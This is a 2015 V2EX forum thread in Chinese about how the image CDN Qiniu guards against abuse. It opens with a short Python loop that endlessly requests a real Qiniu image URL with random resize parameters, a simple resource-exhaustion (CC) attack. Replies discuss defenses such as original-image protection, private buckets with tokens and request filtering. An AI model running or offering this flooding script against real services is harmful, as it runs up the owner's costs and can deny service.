七牛怎么防范这种恶意行为?

2015-07-04 12:16:31 +08:00
 decken

直接上脚本吧,试了一下,好像每次都正常响应请求

import requests
import random
while True:
    requests.get("http://qiniuphotos.qiniudn.com/gogopher.jpg?imageView2/1/w/%d/h/%d" % (int(random.random()*5000), int(random.random()*5000)))
4294 次点击
所在节点    问与答
25 条回复
decken
2015-07-05 09:07:33 +08:00
@phy25 开启原图保护功能的话,这种方法就不行了.
gamexg
2015-07-05 12:54:20 +08:00
就是cc攻击啊,老方法了。
对七牛而言量大了封掉攻击请求完事。
对客户而言就设为私有开token完事。
hjiang
2015-07-27 20:49:33 +08:00
@q84629462 这不是 LeanCloud 的问题。即使是你自己租服务器、带宽,也是可以用类似的恶意攻击方法把你的带宽占满的。

如果发现这种问题可以让 LeanCloud 把攻击的请求过滤掉。另外 LeanCloud 也在增加新功能可以提示开发者一些异常的事件。
q84629462
2015-07-28 01:38:29 +08:00
@hjiang 感谢回复
另外请问lc有即时通讯的云代码平台吗?
想用来做游戏服务器,客户端→lc即时通讯→我的服务器处理数据→lc即时通讯→客户端,这个流程太长
想在lc云代码处理即时通讯数据
hjiang
2015-09-22 12:43:14 +08:00
@q84629462 有的: https://leancloud.cn/docs/realtime_v2.html#云引擎_Hook

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/203268

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX